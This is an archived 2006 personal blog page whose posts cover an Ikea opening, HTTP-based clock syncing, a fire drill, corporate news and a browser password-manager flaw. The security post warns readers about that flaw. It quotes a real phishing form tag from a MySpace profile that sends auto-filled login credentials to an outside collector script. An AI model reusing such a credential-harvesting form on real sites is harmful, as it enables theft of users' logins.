Ikea Tampines

Biow and I went to Ikea Tampines on its opening day today. It was Biow's idea actually. We arrived about 15 minutes before the hordes really descended on the place. There was a queue just to get in. There were policemen stationed around for crowd control.

My impression is that it is somewhat like a warehouse in disguise. They actually have wooden cargo pallets loaded with stocks. These are stacked on rows and rows of racks all the way up to a high ceiling.

From a peakoiler's perspective, I could write about the energy and resources to keep this running. But I can also imagine that it might be good to put the warehouse and retail in the same place. It saves on transportation. Inventory tracking should be easier. They no longer have to "check with the warehouse". The stock is either there, or it is not. As for whether we actually need the stuff they have to offer, that's something for the doomer-inclined to argue over.

Click here for more photos.

(2006-11-30 22:55:29 SGT) [Musings] Permalink Comments [1]

Wednesday November 29, 2006

NTP over HTTP

en.wikipedia.org -> clevervest.com -> rkeene.org :

The problem - you know how inaccurate your PC clock is. You would like the clock to keep correct time, perhaps for your appointments, meetings and so on. But the (corporate) firewall you're behind may block almost everything except HTTP for web surfing. So you cannot use normal NTP (Network Time Protocol) clients.

The solution - use a HTP (HTTP Time Protocol) client. It makes use of the fact that the HTTP headers include a date/time field. For example, if I do a telnet www.microsoft.com 80, I'll get something like this :

HTTP/1.1 200 OK
Date: Wed, 29 Nov 2006 06:28:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32304

So, while *you* cannot access NTP directly, you *hope* that some of these web servers by major corporations have their clocks set by NTP correctly. And that they transmit this information in the HTTP headers. By taking an average reading from a few web servers, the client *hopes* to get some kind of reasonably accurate reading of the current time. So it is NTP over HTTP - well, sort of. HTP client download here.

(2006-11-29 14:38:29 SGT) [Tech] Permalink

"Out for lunch"

There was a fire drill for our building today.
But my usual "early lunch gang" was out for lunch. Literally.
So we didn't have to bother with the fire drill.

Little things like that can make your day. :D

Go on. Tell me I'm bored, or something.

(2006-11-29 11:58:38 SGT) [Musings] Permalink Comments [2]

Monday November 27, 2006

Cross-Site Forms + Password Manager = Security Failure

forums.mozillazine.org, forums.mozillazine.org -> bugzilla.mozilla.org :

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manger!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ...

- As a browser security breach, this is too easy. Have to be very careful before submitting forms with auto-filled passwords. Seems to be a basic design issue that affects both IE and Firefox. Convenience vs security.

Kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. Really too easy. All you need is a website that allows people to edit HTML code. And for you to have a saved password on that site.

2 weeks now, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.

Update - to check if your browser is vulnerable to this exploit, you can try this demo page by Heise Security. From comment #66 in the bugzilla page.

(2006-11-27 16:44:53 SGT) [Tech] Permalink

Tuesday November 21, 2006

Lockheed Martin forms Savi Group

lockheedmartin.com, biz.yahoo.com :

Lockheed Martin announced the establishment of a new organization to provide integrated real-time information solutions and services for securing and managing global supply chains. The Savi Group aligns Lockheed Martin's decision support system expertise for large government In-Transit Visibility (ITV), cargo security and asset management efforts with Savi Technology's real-time, Radio Frequency Identification (RFID)-based data collection and management capabilities for supply chains.

The Savi Group will be led by Vic Verma, who was previously CEO of Savi Technology, acquired by Lockheed Martin in June. Verma explained that the newly formed Savi Group will leverage its expertise to address the development and delivery of integrated ITV, Cargo Security and Mobile Asset Management solutions for the U.S. Department of Homeland Security, U.S. Department of Defense (including the U.S. Transportation Command and the Defense Logistics Agency), as well as other government agencies, port and terminal operators, and commercial customers.

Cog in the machine 2

A cog in the machine.
A bigger machine than last time.

Corporate newsletters are interesting.
Jet fighters are product launches.
Spaceships are new projects.

No time to maintain the referer block list.
So the referers are out. Mostly spam anyway.

No time to blog.
Might get back to it. Later.